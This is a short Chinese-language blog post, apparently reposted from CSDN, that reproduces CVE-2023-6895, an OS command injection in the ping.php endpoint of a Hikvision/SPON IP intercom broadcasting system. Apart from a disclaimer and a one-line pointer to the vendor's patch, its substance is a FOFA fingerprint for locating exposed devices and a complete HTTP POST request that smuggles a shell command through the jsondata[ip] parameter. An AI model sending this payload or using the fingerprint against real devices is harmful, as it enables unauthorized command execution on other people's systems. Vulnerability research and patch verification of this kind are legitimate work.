【漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

发布时间:2024年01月19日


前言

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、系统简介

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

二、漏洞描述

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

三、影响版本

海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE

四、漏洞复现

FOFA:icon_hash=“-1830859634”

漏洞链接:https://127.0.0.1/php/ping.php

漏洞数据包:

POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

jsondata[ip]=a|ipconfig&jsondata[type]=1

在这里插入图片描述

五、修复建议

请到官网下载补丁:https://www.spon.com.cn/

文章来源:https://blog.csdn.net/weixin_46944519/article/details/135698694
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。